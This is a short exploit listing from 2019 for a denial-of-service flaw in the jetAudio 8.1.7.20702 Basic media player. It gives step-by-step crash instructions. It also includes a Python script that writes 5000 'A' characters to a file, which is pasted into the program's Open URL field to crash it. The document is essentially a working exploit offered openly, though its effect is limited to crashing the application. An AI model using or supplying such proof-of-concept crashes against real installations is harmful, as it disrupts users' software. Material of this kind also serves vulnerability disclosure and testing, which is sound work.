jetAudio version 8.1.7.20702 Basic denial of service proof of concept exploit.
433d7505ed4e0c4034218f01d2e95c51
#Exploit Title: jetAudio 8.1.7.20702 Basic - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-07
#Vendor Homepage: http://www.jetaudio.com/
#Software Link: http://www.jetaudio.com/download/
#Tested Version: 8.1.7.20702
#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64
#Steps to produce the crash:
#1.- Run python code: jetAudio_8.1.7.20702.py
#2.- Open jetAudio.txt and copy content to clipboard
#2.- Open jetAudio
#3.- Select Menu > Basic Controls > Open URL...
#4.- In "Enter URL" Paste ClipBoard after "http://"
#5.- Click on "Ok"
#6.- Crashed
cod = "\x41" * 5000
f = open('jetAudio.txt', 'w')
f.write(cod)
f.close()